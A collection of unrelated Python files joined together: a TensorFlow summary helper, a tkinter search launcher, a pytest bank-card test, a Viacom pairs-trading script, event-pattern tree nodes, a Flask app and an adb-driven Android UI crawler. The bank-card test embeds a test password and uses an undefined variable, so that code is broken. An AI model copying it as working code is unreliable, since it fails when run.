    Adds mean/stddev/max/min scalars and a histogram under a 'summaries'
    name scope (TF1 graph-mode summary API).
    """
    with tf.name_scope('summaries'):
        mean = tf.reduce_mean(var)
        tf.summary.scalar('mean', mean)
        # stddev computed in its own sub-scope for tidier graph grouping
        with tf.name_scope('stddev'):
            stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
        tf.summary.scalar('stddev', stddev)
        tf.summary.scalar('max', tf.reduce_max(var))
        tf.summary.scalar('min', tf.reduce_min(var))
        tf.summary.histogram('histogram', var)
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 25 22:24:38 2020
@author: wanta
"""
# Tkinterライブラリのインポート
import tkinter as tk
import tkinter.ttk as ttk
# webbrowserライブラリのインポート
import webbrowser
BROWSER_EDGE = "Microsoft Edge"
BROWSER_CHROME = "Google Chrome"
BROWSER_IE = "Internet Explorer"
SITE_G = "Google"
SITE_Y = "Youtube"
SITE_T = "Twiiter"
class app(tk.Frame):
    """Handlers for the quick-search window.

    Bug fix: ``btn`` referenced ``app.callback`` without calling it, so the
    search button did nothing; it now invokes the handler.
    """

    def callback(event):
        """Read the query box and open it on the chosen site/browser.

        Bound to <Return> (and invoked by ``btn``), hence written as a plain
        function taking only the Tk event, which is unused.
        """
        # Query text from the module-level entry widget.
        search_word = txt.get()
        # Only search when something was typed.
        if search_word != "":
            # Build the search URL for the selected site (Google default).
            search_site = combo_search.get()
            if search_site == SITE_Y:
                # YouTube search
                url = 'https://www.youtube.com/results?search_query=' + search_word
            elif search_site == SITE_T:
                # Twitter search
                url = 'https://twitter.com/search?q='+ search_word + '&src=typed_query'
            else:
                # Google search (default)
                url = 'https://www.google.co.jp/search?q=' + search_word
            # Open in the selected browser, or the OS default.
            # NOTE(review): the hard-coded Windows paths rely on unrecognised
            # backslash escapes passing through verbatim -- raw strings would
            # be safer; confirm the paths on the target machines.
            select_browser = combo.get()
            if select_browser == BROWSER_IE:
                webbrowser.get('"c:\program files\internet explorer\iexplore.exe" %s &').open(url)
            elif select_browser == BROWSER_CHROME:
                webbrowser.get('"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" %s &').open(url)
            elif select_browser == BROWSER_EDGE:
                webbrowser.get('"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" %s &').open(url)
            else:
                webbrowser.open(url)
            # Clear the entry for the next search.
            txt.delete(0, tk.END)

    def btn():
        """Click handler for the search button."""
        # BUG FIX: was a bare `app.callback` reference (no call) -> no-op.
        app.callback(None)
# --- UI construction (module level) ---
root = tk.Tk()
root.attributes("-topmost", True)  # keep the window always on top
root.title("すぐぐる")
root.geometry("420x60")
label = tk.Label(root, text="")
label.pack()
# Browser-selection combo box (empty entry = OS default browser).
combo = ttk.Combobox(root, state='readonly')
combo["values"] = ("",BROWSER_EDGE,BROWSER_IE,BROWSER_CHROME)
combo.current(0)
combo.place(x=10, y=5)
# Search-site selection combo box.
combo_search = ttk.Combobox(root, state='readonly',width=12)
combo_search["values"] = (SITE_G,SITE_Y,SITE_T)
combo_search.current(0)
combo_search.place(x=160, y=5)
# Query text box.
txt = tk.Entry(width=55)
txt.place(x=10, y=30)
# Search button.
# BUG FIX: the original used `command=btn`, but no module-level `btn` exists
# at this point (the handler lives on the class), which raised NameError.
btn = tk.Button(root, text="検索", command=app.btn, height=1,width=8)
btn.place(x=350, y=28)
# Enter key triggers the same search handler.
root.bind('<Return>', app.callback)
root.mainloop()
|
from page.account.account_page import AccountPage
from page.account.bankcard_manage_page import BankcardManagePage
from page.account.add_bankcard_page import AddBankcardPage
from page.account.bankcard_info import BankcardInfo
from logic import bankcard_manage_page as bankcard
import allure
import pytest
import random
import time
# Test account credentials consumed by the parametrized `driver` fixture.
data = [{'username': 'welly229', 'pwd': 'qwer1234'}]
@allure.feature('銀行卡管理')
@allure.story('編輯銀行卡')
@pytest.mark.parametrize('driver', data, indirect=True)
def test_edit_bankcard(driver):
    """Happy path only; assertions still to be added (original note).

    Adds a bank card, opens it from the manage list, confirms the info with
    the account password and checks for the success hint.
    """
    account_page = AccountPage(driver)  # NOTE(review): unused here
    bankcard_manage_page = BankcardManagePage(driver)
    bankcard_info = BankcardInfo(driver)
    bank_name = '平安银行'
    bankcard_account, init_bankcard_count = bankcard.add_bankcard(driver, bank_name=bank_name) if False else bankcard.add_bankcard(driver, bank_name=bank_name)
    card_after_added = init_bankcard_count + 1
    if card_after_added >= 4:
        # The fourth card falls below the fold -- scroll it into view first.
        bankcard_manage_page.slide('swipe up')
    bankcard_manage_page.click_bankcard_to_my_bankcard_page(bank_account=bank_account)
    bankcard_info.input_pwd(pwd=data[0]['pwd'])
    bankcard_info.click_confirm_to_update_my_bankcard_info()
    bankcard_info.check_edit_bankcard_success_hint()
|
"""Demo: importing a submodule also binds the top-level package name."""
import ModuleDirectory.Module2

print(ModuleDirectory)
ModuleDirectory.Module2.say_hi()
class GenericComponent:
    """Base class for named hardware components.

    Fix: the constructor previously accepted ``name`` and discarded it; the
    name is now stored so subclasses (Sensor, Motor) actually keep the
    identity they pass up.  Backward-compatible: only adds an attribute.
    """

    def __init__(self, name: str):
        self.name = name
class Sensor(GenericComponent):
    """A component whose name is fixed to "Sensor"."""

    def __init__(self):
        super().__init__(name="Sensor")
class Motor(GenericComponent):
    """A component whose name is fixed to "Motor"."""

    def __init__(self):
        super().__init__(name="Motor")
'''
Dual share class pairs trading
Viacom Class A and B shares - both refers to the same company, and in fact they both give you ownership in the same underlying firm and in the same underlying firm and the same share of the profits.
Assumption:
- In theory, these two stocks ought to have exacly the same value.
- In practice, because Viacom B share have a larger float, that is there's more shares outstanding, they tend to trade more frequently then Viacon Class A.
So, theres a relationship between these two classes of shares, we might want to try and capitalize on that relationship.
'''
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = 20,10
# Load dated close prices for both Viacom share classes.
data = pd.read_excel('finances/data/02_03_Begin.xls', index_col='Date',usecols=['Date','VIA','VIA.B'])
data.head()
#--- Ratio between VIA and VIA.B (in theory ~1: same underlying firm)
data['Ratio'] = data['VIA'] / data['VIA.B']
print('Average Ratio: ', round(data['Ratio'].mean(), 3))
print('Ratio Variation: ', round(data['Ratio'].var(), 3))
data['Ratio'].plot(title='Ratio between Viacon Class A and Class B')
# 14-day moving average of the ratio is the trading signal.
data['MA'] = data['Ratio'].rolling(14).mean()
# NOTE(review): the signals compare raw *prices* (VIA, VIA.B) against the
# *ratio's* moving average -- the units differ, so almost every row may
# trigger; confirm whether the Ratio column was meant here instead.
data['buyVIA'] = data.apply(lambda x: 1 if x['VIA'] < x['MA'] else 0,axis=1)
data['buyVIA.B'] = data.apply(lambda x: 1 if x['VIA.B'] > x['MA'] else 0, axis=1)
def calc_returnLongOnly(data):
    """Daily long-only strategy return: each leg's day-over-day price change
    (relative to the current price), gated by its buy signal, summed."""
    leg_a = data['buyVIA'] * (data['VIA'].diff() / data['VIA'])
    leg_b = data['buyVIA.B'] * (data['VIA.B'].diff() / data['VIA.B'])
    return leg_a + leg_b
def calc_returnLongShort(data):
    """Daily long/short return: when a leg's buy signal fires, go long that
    leg and short the other; sum both legs."""
    ret_a = data['VIA'].diff() / data['VIA']
    ret_b = data['VIA.B'].diff() / data['VIA.B']
    long_a = data['buyVIA'] * (ret_a - ret_b)
    long_b = data['buyVIA.B'] * (ret_b - ret_a)
    return long_a + long_b
# Attach the daily strategy-return series to the frame.
data['Return - Long Only'] = calc_returnLongOnly(data)
data['Return - Long/Short'] = calc_returnLongShort(data)
data.head()
# data['Profit - Long Only']
# data['Profit - Long/Short']
|
from evaluation.Nodes.Node import Node
from typing import List, Tuple
from datetime import timedelta, datetime
from base.Event import Event
from base.Formula import Formula, AtomicFormula, TrueFormula
from evaluation.PartialMatch import PartialMatch
from base.PatternStructure import SeqOperator, QItem
from misc.Utils import (
merge,
merge_according_to,
is_sorted,
)
from evaluation.Storage import SortedStorage, UnsortedStorage, DefaultStorage, TreeStorageParameters
class InternalNode(Node):
"""
An internal node connects two subtrees, i.e., two subpatterns of the evaluated pattern.
"""
    def __init__(self, sliding_window: timedelta, parent: Node = None, event_defs: List[Tuple[int, QItem]] = None,
                 left: Node = None, right: Node = None):
        """Create an internal node over two (possibly not-yet-attached)
        subtrees; event_defs lists the (index, QItem) pairs this subtree
        covers and may also be filled in later by set_subtrees."""
        super().__init__(sliding_window, parent)
        self._event_defs = event_defs
        self._left_subtree = left
        self._right_subtree = right
def get_leaves(self):
result = []
if self._left_subtree is not None:
result += self._left_subtree.get_leaves()
if self._right_subtree is not None:
result += self._right_subtree.get_leaves()
return result
    def apply_formula(self, formula: Formula):
        """Extract the sub-formula over this subtree's event names, store it
        as this node's condition, and propagate it down both subtrees."""
        names = {item[1].name for item in self._event_defs}
        condition = formula.get_formula_of(names)
        # Fall back to an always-true condition when nothing applies here.
        self._condition = condition if condition else TrueFormula()
        self._left_subtree.apply_formula(self._condition)
        self._right_subtree.apply_formula(self._condition)
def get_event_definitions(self):
return self._event_defs
def _set_event_definitions(self,
left_event_defs: List[Tuple[int, QItem]], right_event_defs: List[Tuple[int, QItem]]):
"""
A helper function for collecting the event definitions from subtrees. To be overridden by subclasses.
"""
self._event_defs = left_event_defs + right_event_defs
def set_subtrees(self, left: Node, right: Node):
"""
Sets the subtrees of this node.
"""
self._left_subtree = left
self._right_subtree = right
self._set_event_definitions(self._left_subtree.get_event_definitions(),
self._right_subtree.get_event_definitions())
def handle_new_partial_match(self, partial_match_source: Node):
"""
Internal node's update for a new partial match in one of the subtrees.
"""
if partial_match_source == self._left_subtree:
other_subtree = self._right_subtree
elif partial_match_source == self._right_subtree:
other_subtree = self._left_subtree
else:
raise Exception() # should never happen
new_partial_match = partial_match_source.get_last_unhandled_partial_match()
new_pm_key = partial_match_source._partial_matches.get_key()
first_event_defs = partial_match_source.get_event_definitions()
other_subtree.clean_expired_partial_matches(new_partial_match.last_timestamp)
partial_matches_to_compare = other_subtree.get_partial_matches(new_pm_key(new_partial_match))
second_event_defs = other_subtree.get_event_definitions()
self.clean_expired_partial_matches(new_partial_match.last_timestamp)
# given a partial match from one subtree, for each partial match
# in the other subtree we check for new partial matches in this node.
for partialMatch in partial_matches_to_compare:
self._try_create_new_match(new_partial_match, partialMatch, first_event_defs, second_event_defs)
def _try_create_new_match(self,
first_partial_match: PartialMatch, second_partial_match: PartialMatch,
first_event_defs: List[Tuple[int, QItem]], second_event_defs: List[Tuple[int, QItem]]):
"""
Verifies all the conditions for creating a new partial match and creates it if all constraints are satisfied.
"""
# We need this because clean_expired doesn't necessarily clean old partial matches.
if self._sliding_window != timedelta.max and (
abs(first_partial_match.last_timestamp - second_partial_match.first_timestamp) > self._sliding_window
or abs(first_partial_match.first_timestamp - second_partial_match.last_timestamp) > self._sliding_window
):
return
events_for_new_match = self._merge_events_for_new_match(first_event_defs, second_event_defs,
first_partial_match.events, second_partial_match.events)
# events merged
if not self._validate_new_match(events_for_new_match):
return
self.add_partial_match(PartialMatch(events_for_new_match))
if self._parent is not None:
self._parent.handle_new_partial_match(self)
def _merge_events_for_new_match(self,
first_event_defs: List[Tuple[int, QItem]],
second_event_defs: List[Tuple[int, QItem]],
first_event_list: List[Event],
second_event_list: List[Event]):
"""
Creates a list of events to be included in a new partial match.
"""
if self._event_defs[0][0] == first_event_defs[0][0]:
return first_event_list + second_event_list
if self._event_defs[0][0] == second_event_defs[0][0]:
return second_event_list + first_event_list
raise Exception()
def _validate_new_match(self, events_for_new_match: List[Event]):
"""
Validates the condition stored in this node on the given set of events.
"""
binding = {
self._event_defs[i][1].name: events_for_new_match[i].payload for i in range(len(self._event_defs))
}
return self._condition.eval(binding)
class AndNode(InternalNode):
    """
    An internal node representing an "AND" operator.
    """
    def create_storage_unit(self, storage_params: TreeStorageParameters, sorting_key: callable = None,
                            relation_op=None, equation_side=None, sort_by_first_timestamp=False):
        """Build this node's partial-match storage, then recursively configure
        both subtrees.

        When sorted storage is enabled, the node's condition is simplified
        into "left_term <relop> right_term" (when possible) so each subtree
        can keep its matches sorted by the term relevant to its side.
        """
        if storage_params is None or not storage_params.sort_storage:
            # Sorted storage disabled: plain storage all the way down.
            self._partial_matches = DefaultStorage()
            self._left_subtree.create_storage_unit(storage_params)
            self._right_subtree.create_storage_unit(storage_params)
            return
        if sorting_key is None:
            # No usable key was derived by the parent: keep unsorted storage.
            self._partial_matches = UnsortedStorage(storage_params.clean_expired_every)
        else:
            self._partial_matches = SortedStorage(
                sorting_key, relation_op, equation_side, storage_params.clean_expired_every
            )
        left_sorting_key = None
        right_sorting_key = None
        relop = None
        left_event_defs = self._left_subtree.get_event_definitions()
        right_event_defs = self._right_subtree.get_event_definitions()
        left_event_names = {item[1].name for item in left_event_defs}
        right_event_names = {item[1].name for item in right_event_defs}
        if storage_params.attributes_priorities is not None:
            simple_formula = self._condition.simplify_formula(
                left_event_names, right_event_names, storage_params.attributes_priorities
            )
        else:
            simple_formula = self._condition.simplify_formula(left_event_names, right_event_names)
        if simple_formula is not None:
            # NOTE(review): the key lambdas assume pm.events is ordered like the
            # corresponding subtree's event_defs -- confirm against PartialMatch.
            left_term, relop, right_term = simple_formula.dismantle()
            left_sorting_key = lambda pm: left_term.eval(
                {left_event_defs[i][1].name: pm.events[i].payload for i in range(len(pm.events))}
            )
            right_sorting_key = lambda pm: right_term.eval(
                {right_event_defs[i][1].name: pm.events[i].payload for i in range(len(pm.events))}
            )
        self._left_subtree.create_storage_unit(storage_params, left_sorting_key, relop, "left")
        self._right_subtree.create_storage_unit(storage_params, right_sorting_key, relop, "right")
class SeqNode(InternalNode):
    """
    An internal node representing a "SEQ" (sequence) operator.
    In addition to checking the time window and condition like the basic node does, SeqNode also verifies the order
    of arrival of the events in the partial matches it constructs.
    """
    def _set_event_definitions(self,
                               left_event_defs: List[Tuple[int, QItem]], right_event_defs: List[Tuple[int, QItem]]):
        # Keep event definitions ordered by their position in the sequence.
        self._event_defs = merge(left_event_defs, right_event_defs, key=lambda x: x[0])

    def _merge_events_for_new_match(self,
                                    first_event_defs: List[Tuple[int, QItem]],
                                    second_event_defs: List[Tuple[int, QItem]],
                                    first_event_list: List[Event],
                                    second_event_list: List[Event]):
        # Interleave the two event lists following the sequence order of
        # their definitions (not simple concatenation as in InternalNode).
        return merge_according_to(first_event_defs, second_event_defs,
                                  first_event_list, second_event_list, key=lambda x: x[0])

    def _validate_new_match(self, events_for_new_match: List[Event]):
        # A SEQ match is valid only when events actually arrived in order;
        # the regular condition check then applies on top.
        if not is_sorted(events_for_new_match, key=lambda x: x.timestamp):
            return False
        return super()._validate_new_match(events_for_new_match)

    def create_storage_unit(self, storage_params: TreeStorageParameters, sorting_key: callable = None,
                            relation_op=None, equation_side=None, sort_by_first_timestamp=False):
        """
        This function creates the storage for partial_matches it gives a special key: callable
        to the storage unit which tells the storage unit on which attribute(only timestamps here)
        to sort.
        We assume all events are in SEQ(,,,,...) which makes the order in partial match the same
        as in event_defs: [(1,a),(2,b)] in event_defs and [a,b] in pm.
        """
        if storage_params is None or not storage_params.sort_storage:
            self._partial_matches = DefaultStorage()
            self._left_subtree.create_storage_unit(storage_params)
            self._right_subtree.create_storage_unit(storage_params)
            return
        if sorting_key is None:
            self._partial_matches = UnsortedStorage(storage_params.clean_expired_every)
        else:
            self._partial_matches = SortedStorage(
                sorting_key, relation_op, equation_side, storage_params.clean_expired_every, sort_by_first_timestamp
            )
        left_event_defs = self._left_subtree.get_event_definitions()
        right_event_defs = self._right_subtree.get_event_definitions()
        # comparing min and max leaf index of two subtrees
        min_left = min(left_event_defs, key=lambda x: x[0])[0]  # [ { ] } or [ { } ]
        max_left = max(left_event_defs, key=lambda x: x[0])[0]  # { [ } ] or { [ ] }
        min_right = min(right_event_defs, key=lambda x: x[0])[0]  # [ ] { }
        max_right = max(right_event_defs, key=lambda x: x[0])[0]  # { } [ ]
        # left_sort / right_sort choose which event's timestamp to sort on:
        # -1 (subtree's last event) when that side wholly precedes/follows
        # the other; 0 (first event) for the interleaved cases.
        left_sort = 0
        right_sort = 0
        relop = None
        if max_left < min_right:  # 3) left side entirely before right side
            left_sort = -1
            right_sort = 0
            relop = "<="
        elif max_right < min_left:  # 4) right side entirely before left side
            left_sort = 0
            right_sort = -1
            relop = ">="
        elif min_left < min_right:  # 1) interleaved, left side starts first
            relop = "<="
        elif min_right < min_left:  # 2) interleaved, right side starts first
            relop = ">="
        assert relop is not None
        left_sort_by_first_timestamp = True if left_sort == 0 else False
        right_sort_by_first_timestamp = True if right_sort == 0 else False
        self._left_subtree.create_storage_unit(
            storage_params, lambda pm: pm.events[left_sort].timestamp, relop, "left", left_sort_by_first_timestamp
        )
        self._right_subtree.create_storage_unit(
            storage_params, lambda pm: pm.events[right_sort].timestamp, relop, "right", right_sort_by_first_timestamp
        )
|
import base64
import re

import cv2
import numpy as np
from flask import Flask, render_template, jsonify, request, send_from_directory
from werkzeug import secure_filename
from werkzeug.datastructures import ImmutableMultiDict
app=Flask(__name__)
def convert_to_diff_text(text):
    """Placeholder converter.

    Echoes the incoming text to stdout and always returns the fixed
    placeholder token 'treek'.
    """
    print(text)
    return 'treek'
@app.route('/')
def func():
    """Serve the landing page."""
    template_name = 'index.html'
    return render_template(template_name)
@app.route('/second')
def func_two():
    """Serve the second page."""
    template_name = 'second.html'
    return render_template(template_name)
@app.route('/text_text')
def func_three():
    """Serve the text-to-text conversion page."""
    template_name = 'text_text.html'
    return render_template(template_name)
@app.route('/image_speech')
def func_four():
    """Serve the image-to-speech page."""
    template_name = 'image_speech.html'
    return render_template(template_name)
@app.route('/static/<path:path>')
def send_js(path):
    """Serve a file from the 'static' directory.

    Fixed: `send_from_directory` was never imported, so every request to
    this route raised NameError.  Flask's send_from_directory also guards
    against path traversal outside the static folder.
    """
    return send_from_directory('static', path)
@app.route('/api/text_text', methods = ['GET'])
def convert_text_to_text():
    """API endpoint: convert the 'text' query parameter and return the result.

    Fixed: the original did args.to_dict(flat=False)['text'][0], which raised
    KeyError (an HTTP 500) whenever the parameter was absent; request.args.get
    returns the first value or a default.
    """
    text = request.args.get('text', '')
    print(text)
    return convert_to_diff_text(text)
@app.route('/fill', methods=['GET', 'POST'])
def fill_():
    """Persist the submitted 'name' form field to x.txt and echo it back.

    Fixes: the route only registered GET, so the POST branch was dead code;
    the file handle was never closed; and the final `return jsonify(data)`
    referenced an undefined name and sat outside the POST branch.
    """
    if request.method == 'POST':
        name = request.form['name']
        # `with` guarantees the handle is flushed and closed.
        with open("x.txt", "w") as handle:
            handle.write(name)
        return jsonify({"name": name})
    return jsonify({})
@app.route('/uploader', methods = ['POST'])
def upload_file():
    """Decode the base64 data-URL posted in the 'data' form field and save it
    to savedimage.png."""
    if request.method == 'POST':
        print("hell")
        # The payload looks like "data:image/png;base64,<encoded>"; keep only
        # the part after the comma.
        encoded = request.form.get("data").split(",")[1]
        raw = base64.b64decode(encoded)
        with open("savedimage.png", "wb") as fe:
            fe.write(raw)
        return "saved_image"
if __name__=='__main__':
    # Development server with auto-reload; not suitable for production.
    app.run(debug=True)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import xml.etree.ElementTree as ET
import getWidget
from drawPic import drawPic
from adbExtend import adbExtend
from deviceMonitor import AppPerformanceInfo
from bugDetect import BugDetect
import os, logging, coloredlogs
import time,threading
coloredlogs.install()
# view (activity) structure
class View(object):
    """Model of one UI state (activity + top view) and its clickable nodes.

    `index` (actName + topView) uniquely identifies the state within the
    traversal tree; `notes` is the list of Node widgets found on it.
    """
    def __init__(self, level=0, actName='', topView='', father='', nodes=None):
        self.index = actName + topView
        self.level = level
        self.actName = actName
        # Activity names look like "package/activity"; keep the package part.
        self.packgeName = actName.split('/')[0]
        self.father = father
        self.topView = topView
        # Fixed: the original iterated the default nodes=None, raising
        # TypeError; copy defensively instead.
        self.notes = list(nodes) if nodes is not None else []

    def getIndex(self):
        return self.index

    def getActName(self):
        return self.actName

    def getPackgaName(self):
        # (sic) method name kept as-is for existing callers
        return self.packgeName

    # Get current frame layout to identify activity and content change.
    def getTopView(self):
        return self.topView

    def getNotes(self):
        return self.notes

    def getLevel(self):
        return self.level

    def setFather(self, father):
        self.father = father

    def setLevel(self, level):
        self.level = level

    def showView(self, showNodesFlag=False):
        """Log a summary of this view and how many nodes were already traveled."""
        logging.info('--------------------- start -----------------------------')
        logging.info( 'Current View: %s, level: %d, father: %s, node list as bellow'%(self.actName, self.level, self.father) )
        sumNodes = len(self.notes)
        travedNode = 0
        for mn in self.notes:
            if showNodesFlag:
                mn.showNode()
            # status False means the node was already tapped during traversal
            if not mn.getStatus():
                travedNode = travedNode + 1
        logging.info('Current Nodes, Sum:%d, Already Traveled: %d'%(sumNodes,travedNode) )
        logging.info('---------------------- end ----------------------------')
# node structure
# description for widget on view(activity)
# as node list, involved in view
class Node(object):
    """A clickable widget parsed from a uiautomator UI dump.

    `bounds` uses the format '[x0,y0][x1,y1]'; the four corners and the
    centre point (used for adb tap injection) are precomputed.
    """
    def __init__(self, id, bounds='[0,0][0,0]', text='', status=True, type=''):
        # `id` and `type` shadow builtins but are part of the callers'
        # keyword API, so the names are kept.
        self.id = id
        self.type = type
        # status True = not yet tapped during traversal.
        self.status = status
        self.path = id
        self.bounds = bounds
        self.text = text
        # Parse '[x0,y0][x1,y1]' in one pass instead of four ad-hoc splits.
        corners = bounds.replace('][', ',').strip('[]').split(',')
        self.x0, self.y0, self.x1, self.y1 = (int(c) for c in corners)
        # Fixed: integer division preserves the original Python-2 semantics;
        # the old "/ 2" yields floats under Python 3, which break tap coords.
        self.xcenter = (self.x0 + self.x1) // 2
        self.ycenter = (self.y0 + self.y1) // 2

    def getX0(self):
        return self.x0

    def getX1(self):
        return self.x1

    def getY0(self):
        return self.y0

    def getY1(self):
        return self.y1

    def getXcenter(self):
        return self.xcenter

    def getYcenter(self):
        return self.ycenter

    def getID(self):
        return self.id

    def getPath(self):
        return self.path

    def getStatus(self):
        return self.status

    def getText(self):
        return self.text

    def setStatus(self, status):
        self.status = status

    def showNode(self):
        logging.info('Current Node %s, bounds: %s, text: %s, status: %s, type: %s'%(self.id, self.bounds,self.text, self.status, self.type))
class viewAnalysis(object):
    """Parses the device's UI dump into View/Node models and renders
    annotated screenshots of the widgets."""

    def getCurrentView(self):
        """Snapshot the foreground activity as a View with its clickable nodes."""
        adb = adbExtend()
        actName = adb.getCurrentActivityO()
        topView = adb.getCurrentTopView()
        nodes = self.getNodes()
        mView = View(actName=actName, topView=topView, nodes=nodes)
        return mView

    def getNodes(self):
        """Dump the UI hierarchy and build one Node per clickable widget."""
        fileName = 'tmp.xml'
        getWidget.activityDump(fileName)
        # Fixed: `with` closes the dump file (the original leaked the handle).
        with open('./' + fileName, 'r') as f:
            tree = ET.parse(f)
        root = tree.getroot()
        mNodes = []
        widgetNumber = 1
        for child in root.iter('node'):
            if 'true' in child.attrib['clickable']:
                try:
                    mBounds = child.attrib.get('bounds')
                    mClass = child.attrib.get('class')
                    mNode = Node(widgetNumber, mBounds, type=mClass)
                    mNodes.append(mNode)
                    widgetNumber = widgetNumber + 1
                except Exception as e:
                    # Fixed: "except Exception, e" is Python-2-only syntax, and
                    # logging.error(Exception, ":", e) misused lazy %-formatting.
                    logging.error("Exception: %s", e)
        return mNodes

    def drawView(self, mView):
        """Save a screenshot annotated with each node's bounds, text and id."""
        dpic = drawPic()
        picFile = mView.getActName().split('.')[-1]
        picFile = picFile + '.jpeg'
        logging.info('Draw view as file: %s' % picFile)
        adb = adbExtend()
        [xmax, ymax] = adb.get_resolution()
        dpic.createPic(int(xmax), int(ymax), picFile)
        adb.getSnapshot(picFile)
        for mn in mView.getNotes():
            x0 = mn.getX0()
            y0 = mn.getY0()
            # Fixed: the original read getY1() into x1, collapsing every
            # drawn rectangle into a degenerate box.
            x1 = mn.getX1()
            y1 = mn.getY1()
            xcenter = mn.getXcenter()
            ycenter = mn.getYcenter()
            mText = mn.getText()
            mID = mn.getID()
            dpic.drawRec(x0, y0, x1, y1, picFile)
            dpic.drawText(x0, y0, mText, picFile)
            dpic.drawText(xcenter, ycenter, str(mID), picFile)

    # for test, show all wighet of current activity
    def phaseXML(self, fileName):
        """Debug helper: draw every widget of the current activity onto
        activity.jpeg (clickable in default colour, unclickable in blue)."""
        getWidget.activityDump(fileName)
        with open('./' + fileName, 'r') as f:
            tree = ET.parse(f)
        root = tree.getroot()
        # Fixed: extra positional args to logging.info are %-format args; the
        # original passed values without placeholders in the message.
        logging.info('root.tag = %s', root.tag)
        logging.info('root.attrib = %s', root.attrib)
        miniSize = 0
        miniNode = None
        dpic = drawPic()
        picFile = 'activity.jpeg'
        adb = adbExtend()
        [xmax, ymax] = adb.get_resolution()
        dpic.createPic(int(xmax), int(ymax), picFile)
        widgetNumber = 1
        for child in root.iter('node'):
            logging.info('------- ×××××××××××××××××××××××××××××××× -------')
            if 'true' in child.attrib['clickable']:
                logging.info(child.attrib)
                logging.info('----childrens----')
                bounds = child.attrib.get('bounds')
                mClass = child.attrib.get('class')
                logging.info('bounds:' + str(bounds))
                logging.info('class:' + str(mClass))
                try:
                    x0 = bounds.split(',')[0].replace('[', '')
                    y0 = bounds.split(',')[1].split('][')[0]
                    x1 = bounds.split(',')[1].split('][')[1]
                    y1 = bounds.split(',')[2].replace(']', '')
                    dpic.drawRec(int(x0), int(y0), int(x1), int(y1), picFile)
                    dpic.drawText(int(x0), int(y0), child.attrib.get('text'), picFile)
                    # Integer division keeps the original Python-2 semantics.
                    xcenter = (int(x0) + int(x1)) // 2
                    ycenter = (int(y0) + int(y1)) // 2
                    dpic.drawText(int(xcenter), int(ycenter), str(widgetNumber), picFile)
                    widgetNumber = widgetNumber + 1
                except Exception as e:
                    logging.error("Exception: %s", e)
            else:
                logging.info('current widget unclickable')
                logging.info(child.attrib)
                logging.info('----childrens----')
                bounds = child.attrib.get('bounds')
                logging.info('bounds:' + str(bounds))
                try:
                    x0 = bounds.split(',')[0].replace('[', '')
                    y0 = bounds.split(',')[1].split('][')[0]
                    x1 = bounds.split(',')[1].split('][')[1]
                    y1 = bounds.split(',')[2].replace(']', '')
                    dpic.drawRec(int(x0), int(y0), int(x1), int(y1), picFile, col='blue')
                except Exception as e:
                    logging.error("Exception: %s", e)
class viewTree(object):
    """Flat registry of visited views, looked up by their index string."""

    def __init__(self):
        self.mViewList = []

    def addView(self, mView):
        """Register a newly discovered view."""
        self.mViewList.append(mView)

    def findView(self, viewIndex):
        """Return the stored view whose index matches, or None when absent."""
        for candidate in self.mViewList:
            if candidate.getIndex() == viewIndex:
                return candidate
        return None

    def checkViewExist(self, mView):
        """True when a view with the same index was registered before."""
        target = mView.getIndex()
        return any(v.getIndex() == target for v in self.mViewList)
class viewTraversal(object):
    """Depth-bounded DFS over the app's UI: taps every clickable node and
    recurses into views (activities / content states) not seen before."""

    def __init__(self, maxLevel = 3):
        # maxLevel bounds the recursion depth of travelCurrentView().
        self.maxLevel = maxLevel
        self.mViewTree = viewTree()

    def mutiLuanchApp(self, activityName, packageName, times):
        # Restart the app several times (warm-up pass for launch-time metrics).
        for i in range(times):
            adbExtend().stopActivity(packageName)
            time.sleep(1)
            adbExtend().startActivity(activityName)
            time.sleep(1)

    def startTravelView(self):
        """Entry point: snapshot the root view, traverse it recursively, then
        finish with a monkey stress run on the package."""
        level = 1
        # adb = adbExtend()
        viewAna = viewAnalysis()
        self.rootView = viewAna.getCurrentView()
        self.rootView.setFather('ROOT')
        self.rootView.setLevel(level)
        self.rootView.showView()
        self.mutiLuanchApp(self.rootView.getActName(), self.rootView.getPackgaName(), 3)
        self.travelCurrentView(self.rootView)
        adbExtend().monkeyTest(self.rootView.getPackgaName(), 1000)

    def travelCurrentView(self, mView):
        # check current view is a new view or not
        # if yes, add the newview to view list, then start to travel it
        # if not, replace the view with old view in view list, continue to travel it
        if self.mViewTree.checkViewExist(mView):
            viewIndex = mView.getIndex()
            mView = self.mViewTree.findView(viewIndex)
            logging.info( '***** --- current view existed, replace it with old view in view list')
            logging.info( 'view name %s'%mView.getActName())
            # mView.showView()
        else:
            self.mViewTree.addView(mView)
        currentLevel = mView.getLevel()
        if currentLevel > self.maxLevel:
            logging.info( 'current level is bigger than max level, current test stop')
            logging.info( 'current level: %d, max level: %d'%(currentLevel, self.maxLevel))
            return
        else:
            logging.info( 'level match, continue testing ')
        rootAct = self.rootView.getActName()
        rootPackage = self.rootView.getPackgaName()
        currentAct = mView.getActName()
        currentView = mView.getTopView()
        for mNode in mView.getNotes():
            # set node status to false, that means the node has been touched(traveled) already
            if mNode.getStatus():
                mNode.setStatus(False)
                # NOTE(review): actName/viewName are read *before* the tap in
                # enterSan(), so the change detection below compares against
                # the pre-tap foreground state -- confirm this is intended.
                actName = adbExtend().getCurrentActivityO()
                viewName = adbExtend().getCurrentTopView()
                # Left the package under test: relaunch the root activity and
                # abort this view's traversal.
                if not rootPackage==actName.split('/')[0]:
                    adbExtend().startActivity(rootAct)
                    return
                self.enterSan(mNode)
                # compare new view and old view with activity and topview.
                # activity not match, means view changed
                logging.info( '-------->Activity name: ' + actName)
                if not(currentAct == actName):
                    logging.info( '**** Activity not compared******************')
                    logging.info( 'old: ' + currentAct)
                    logging.info( 'new: ' + actName)
                    sanView = viewAnalysis().getCurrentView()
                    sanView.setLevel(currentLevel+1)
                    sanView.setFather(currentAct)
                    self.travelCurrentView(sanView)
                    # self.backKey()
                # activity match but top view not match, means content changed, also assert as a new view
                elif not(currentView == viewName):
                    logging.info( '**** Activity compare ***********************')
                    logging.info( '**** **** TopView not compared******************')
                    logging.info( 'old: ' + currentView)
                    logging.info( 'new: ' + viewName)
                    # self.backKey()
                    sanView = viewAnalysis().getCurrentView()
                    sanView.setLevel(currentLevel+1)
                    sanView.setFather(currentAct)
